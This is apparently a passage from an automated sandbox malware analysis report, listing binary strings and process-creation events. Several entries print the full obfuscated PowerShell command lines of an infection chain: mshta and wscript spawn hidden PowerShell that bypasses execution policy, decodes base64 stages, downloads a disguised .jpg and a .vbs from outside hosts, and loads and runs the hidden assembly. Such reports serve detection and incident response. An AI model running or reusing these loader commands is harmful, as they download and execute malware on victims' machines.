                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000009.00000002.2417114704.000000000A421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2454422124.000000000AA20000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = 